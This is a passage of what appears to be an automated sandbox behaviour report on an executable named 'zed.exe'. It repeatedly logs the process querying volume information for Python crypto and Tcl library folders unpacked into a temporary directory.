Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\PublicKey VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\PublicKey VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Util VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\encoding VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\http1.0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22602\_tcl_data\msgs VolumeInformation	Jump to behavior
